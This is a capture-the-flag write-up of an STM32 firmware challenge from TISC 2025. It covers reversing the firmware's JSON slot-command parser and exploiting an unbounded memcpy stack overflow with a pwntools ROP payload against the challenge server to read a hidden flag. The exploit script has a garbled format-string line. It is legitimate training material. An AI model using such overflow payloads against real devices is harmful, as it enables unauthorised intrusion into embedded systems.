Last year many brave agents showed the world what they could do against PALINDROME’s custom TPM chips. Their actions sent chills down the spines of all those who seek to do us harm. This year, we managed to exfiltrate an entire STM32-based system and its firmware from within SPECTRE. You can perform your attack on a live STM32 module hosted behind enemy lines: nc chals.tisc25.ctf.sg 51728. Attached files: HWisntThatHard_v2.tar.xz

This hardware challenge is a sequel to last year’s TISC level 5. The challenge archive file includes the firmware file, the flash memory file and an emulator. The emulator allows us to run the firmware file with the supplied flash memory, simulating the remote challenge environment locally.

Running the emulator, we can interact with the firmware.

1
2
3
$ ./stm32-emulator config.yaml
hi
Unknown command, expected read slot or check slot with data

Let’s reverse engineer the firmware to figure out how to send commands to the firmware. Throwing the firmware into IDA MCP server, we get a pretty nice decompilation. Throwing the decompilation into ChatGPT, we get a pretty nice explanation:

1
2
3
4
5
Read operation:
{"slot": <unsigned integer>[optional exponent]}

Check operation:
{"slot": <unsigned integer>[optional exponent], "data": null | <payload>}

For reference, here’s the important bits of the actual decompilation:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
    // It’s a single-object streaming parser for a UART command that looks like:
    // {"slot": <unsigned integer>[optional exponent], "data": null | <payload>}
    parse_slot_data_cmd((int)&slot_number, &cmd_buffer);// Parse received command
    if ( is_slot_cmd )
    {
      curr_slot = slot_number;                  // Process slot read/check command
      if ( (unsigned int)(slot_number - 1) <= 0xE )
      {
        memory_set(spi_mem_buf, 0, 32);         // Read data from slot in SPI flash
        flash_cmd[0] = 3;
        flash_cmd[1] = __rev16(32 * curr_slot);
        toggle_spi_cs(1073872896, 0x8000, 0);
        spi_flash_write(&spi_base_address, flash_cmd, 4, 0xFFFFFFFF);
        spi_flash_read(&spi_base_address, (int)spi_mem_buf, 32, 0xFFFFFFFF);
        toggle_spi_cs(1073872896, 0x8000, 1);
        if ( is_check_cmd )
        {
          process_command_result(spi_mem_buf, b);// Process data check operation
          if ( *(_DWORD *)b )
            free_memory(*(int *)b, pattern_size - *(_DWORD *)b);
        }
        else
        {
          string_append(uart_buffer, (int)"Slot ", 5);// Format and output slot contents
          appended = append_int_to_string(uart_buffer, curr_slot);
          string_append(appended, (int)" contains: [", 12);
          p_slot_data_start = &slot_data_start;
          while ( 1 )
          {
            v22 = (unsigned __int8)*++p_slot_data_start;
            append_int_to_string(uart_buffer, v22);
            if ( p_slot_data_start == &slot_data_end )
              break;
            string_append(uart_buffer, (int)",", 1);
          }

Let’s try it!

1
2
3
4
5
6
7
8
{"slot": 0}
Out of bounds!
{"slot": 1}
Slot 1 contains: [84,73,83,67,123,70,65,75,69,95,70,76,65,71,95,71,79,69,83,95,72,69,82,69,125,0,0,0,0,0,0,0]
{"slot":15}
Slot 15 contains: [67,82,69,68,123,82,66,95,65,78,68,95,74,70,95,87,69,82,69,95,72,69,82,69,125,0,0,0,0,0,0,0]
{"slot":16}
Out of bounds!

The read operation allows us to read data at the specified slot. In fact, these slots correspond to different offsets in SPI memory. Each slot is a 0x20 byte offset from the start of the flash memory.

1
2
3
4
5
6
7
8
9
10
11
$ xxd ext-flash.bin | head
00000000: 5449 5343 7b52 4541 4c5f 464c 4147 5f47  TISC{REAL_FLAG_G
00000010: 4f45 535f 4845 5245 7d00 0000 0000 0000  OES_HERE}.......
00000020: 5449 5343 7b46 414b 455f 464c 4147 5f47  TISC{FAKE_FLAG_G
00000030: 4f45 535f 4845 5245 7d00 0000 0000 0000  OES_HERE}.......
00000040: 5449 5343 7b46 414b 455f 464c 4147 5f47  TISC{FAKE_FLAG_G
00000050: 4f45 535f 4845 5245 7d00 0000 0000 0000  OES_HERE}.......
00000060: 5449 5343 7b46 414b 455f 464c 4147 5f47  TISC{FAKE_FLAG_G
00000070: 4f45 535f 4845 5245 7d00 0000 0000 0000  OES_HERE}.......
00000080: 5449 5343 7b46 414b 455f 464c 4147 5f47  TISC{FAKE_FLAG_G
00000090: 4f45 535f 4845 5245 7d00 0000 0000 0000  OES_HERE}.......

The real flag is at offset 0 so we should try to read the data of slot 0. However, the index of 0 is out of bounds as it fails the check (unsigned int)(slot_number - 1) <= 0xE.

Other than reading from a slot, we can check slot data with the other command. By specifying a data byte array, the firmware returns the number of bytes that match the actual data.

1
2
3
4
5
6
7
8
{"slot": 1}
Slot 1 contains: [84,73,83,67,123,70,65,75,69,95,70,76,65,71,95,71,79,69,83,95,72,69,82,69,125,0,0,0,0,0,0,0]
{"slot": 1, "data":[84,73,83,67,123]}
Checking...
Result: 6
{"slot": 1, "data":[41,41,41,41,41]}
Checking...
Result: 1

The result is off-by-one but it doesn’t matter.

Firmware challenges are usually either rev or pwn challenges. Since there don’t appear to be any hidden functionality in the firmware, we should start looking for vulnerabilities. Based on the two syntax of the two commands, it’s quite likely that the vulnerability is in the more complex check operation. Given that we can supply an arbitrarily-sized array, buffer overflow immediately comes to mind.

Looking back at the decompilation, the input command is parsed. If it is a check operation, process_command_result() is called.

1
2
3
4
5
6
if ( is_check_cmd )
        {
          process_command_result(spi_mem_buf, b);// Process data check operation
          if ( *(_DWORD *)b )
            free_memory(*(int *)b, pattern_size - *(_DWORD *)b);
        }

This is a helper function that calls get_check_result(), formats the output and sends it to UART.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
int process_command_result(char *a, char *b)
{
  int v2; // r5
  _DWORD *appended; // r0
  int (__fastcall *v4)(int, int); // r2
  _BYTE *v5; // r6
  _DWORD *v6; // r4
  int v7; // r1
  _DWORD *v8; // r0
  int v9; // r1
  int (__fastcall *v11)(int, int); // r3

  v2 = get_check_result((int)a, (char **)b);
  string_append(uart_buffer, (int)"Result: ", 8);
  appended = append_int_to_string(uart_buffer, v2);
  v5 = *(_BYTE **)((char *)appended + *(_DWORD *)(*appended - 12) + 124);
  if ( !v5 )
    handle_string_error((int)appended);
  v6 = appended;
  if ( v5[28] )
  {
    v7 = (unsigned __int8)v5[39];
  }
  else
  {
    prepare_string_for_output(v5);
    v4 = default_string_handler;
    v11 = *(int (__fastcall **)(int, int))(*(_DWORD *)v5 + 24);
    v7 = 10;
    if ( v11 != default_string_handler )
      v7 = v11((int)v5, 10);
  }
  v8 = finalize_string(v6, v7, (int)v4);
  uart_send_string(v8, v9);
  return v2;
}

get_check_result() is a thunk function that wraps check_slot_pattern(), which is where we find the vulnerability.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
int __fastcall get_check_result(int a1, char **a2)
{
  return check_slot_pattern(a1, a2);
}

int __fastcall check_slot_pattern(int mem_ptr, char **str_input)
{
  int matches; // r5
  int other_ptr; // r0
  char *buf_ptr; // r3
  int char1_; // r1
  int char1; // t1
  int char2; // t1
  _DWORD *v9; // r0
  int (__fastcall *v10)(int, int); // r2
  _BYTE *v11; // r4
  int v12; // r1
  _DWORD *v13; // r0
  int v14; // r1
  int (__fastcall *v16)(int, int); // r3
  char buffer_pre; // [sp+0h] [bp-31h] BYREF
  int buffer; // [sp+1h] [bp-30h] BYREF
  char buffer_end; // [sp+20h] [bp-11h] BYREF

  memory_copy((int)&buffer, *str_input, str_input[1] - *str_input);// OOB memcpy
  // [...]

There is an unbounded memory copy of the supplied data bytes into a stack buffer. Although the firmware is ARM, stack overflow exploitation remains similar to x86. We can use the buffer overflow to overwrite the return pointer as well as stack variables. Looking back at the decompilation

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
    // It’s a single-object streaming parser for a UART command that looks like:
    // {"slot": <unsigned integer>[optional exponent], "data": null | <payload>}
    parse_slot_data_cmd((int)&slot_number, &cmd_buffer);// Parse received command
    if ( is_slot_cmd )
    {
      curr_slot = slot_number;                  // Process slot read/check command
      if ( (unsigned int)(slot_number - 1) <= 0xE )
      {
        memory_set(spi_mem_buf, 0, 32);         // Read data from slot in SPI flash
        flash_cmd[0] = 3;
        flash_cmd[1] = __rev16(32 * curr_slot);
        toggle_spi_cs(1073872896, 0x8000, 0);
        spi_flash_write(&spi_base_address, flash_cmd, 4, 0xFFFFFFFF);
        spi_flash_read(&spi_base_address, (int)spi_mem_buf, 32, 0xFFFFFFFF);
        toggle_spi_cs(1073872896, 0x8000, 1);
        if ( is_check_cmd )
        {
          process_command_result(spi_mem_buf, b);// Process data check operation
          if ( *(_DWORD *)b )
            free_memory(*(int *)b, pattern_size - *(_DWORD *)b);
        }

We want to jump into code execution somewhere after the slot_number check. We also want curr_slot to be zero. The constraints are quite easy to satisfy so we don’t have to craft the ROP chain too carefully.

Recall that the call chain is main() -> process_command_result() -> get_check_result() -> check_slot_pattern(). To keep things simple, we should properly unwind the stack before returning to main(). So, I first hijacked the instruction pointer when check_slot_pattern() returns to the function epilogue of process_command_result() (we can ignore get_check_result() because it’s a thunk function). Then, I hijacked the instruction pointer of when check_slot_pattern() returns to some instruction after the slot_number check in main(). Then, the remainder of the payload was zero bytes, which overwrites the stack variables in main(), which should zero out curr_slot.

After trying a few different main() instruction addresses, we find one that works.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
from pwn import *
import time

context.log_level = "debug"
p = remote("chals.tisc25.ctf.sg", 51728)
time.sleep(0.5)

def bof(payload: bytes):
    payload = str(list(payload))
    p.sendline(f'slot}'.encode("ascii"))

payload = b"A" * 0x20
payload += b"B" * 4  # alignment
payload += b"C" * 4  # r4
payload += b"D" * 4  # r5
payload += p32(0x8000278 | 1)  # pc (epilogue)

payload += p32(0)
payload += p32(0)
payload += p32(0)
payload += p32(0x8007B1E | 1)  # pc (after check)
payload += p32(0) * 100  # overwrite stack vars

bof(payload)

p.interactive()

Flag: TISC{3mul4t3d_uC_pwn3d}